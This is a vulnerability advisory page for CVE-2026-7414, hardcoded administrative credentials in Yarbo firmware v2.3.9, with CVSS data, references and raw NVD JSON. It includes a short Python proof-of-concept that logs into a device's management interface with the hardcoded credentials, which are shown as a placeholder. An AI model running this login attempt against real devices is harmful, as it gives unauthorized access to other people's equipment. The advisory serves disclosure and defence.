CVE-2026-7414

Description

Yarbo firmware v2.3.9 contains hardcoded administrative credentials embedded in the firmware image. These credentials are identical across all devices running this firmware and cannot be changed or removed by end users, enabling trivial unauthorized access to device management interfaces by anyone who knows them.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Yarbo Firmware v2.3.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (example)
target_url = "http://<target_ip>/login"

# Hardcoded credentials found in firmware v2.3.9
username = "admin"
password = "hardcoded_secret_password" # Extracted from firmware image

def exploit():
    print(f"[*] Attempting to login to {target_url}...")
    session = requests.Session()
    
    # Payload with hardcoded credentials
    payload = {
        "username": username,
        "password": password
    }

    try:
        response = session.post(target_url, data=payload, timeout=5)
        # Check for successful login indicators (e.g., HTTP 200, specific token)
        if response.status_code == 200 and "dashboard" in response.text:
            print("[+] Login successful! Hardcoded credentials are valid.")
            print("[+] Access granted to device management interface.")
        else:
            print("[-] Login failed or target unreachable.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7414
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7414
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7414/
[4] VulDB https://vuldb.com/cve/CVE-2026-7414
[5] https://github.com/Bin4ry/yarbo-nat-in-my-back-yard
[6] https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001111111111100011111111111000000000000000000000000000000000000000000000000000001000
[7] https://github.com/Bin4ry/yarbo-nat-in-my-back-yard#3--hardcoded-developer-credentials-in-production-apk

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7414", "sourceIdentifier": "[email protected]", "published": "2026-05-07T17:15:59.460", "lastModified": "2026-05-07T18:46:25.867", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Yarbo firmware v2.3.9 contains hardcoded administrative credentials embedded in the firmware image. These credentials are identical across all devices running this firmware and cannot be changed or removed by end users, enabling trivial unauthorized access to device management interfaces by anyone who knows them."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/Bin4ry/yarbo-nat-in-my-back-yard", "source": "[email protected]"}, {"url": "https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001111111111100011111111111000000000000000000000000000000000000000000000000000001000", "source": "[email protected]"}, {"url": "https://github.com/Bin4ry/yarbo-nat-in-my-back-yard#3--hardcoded-developer-credentials-in-production-apk", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}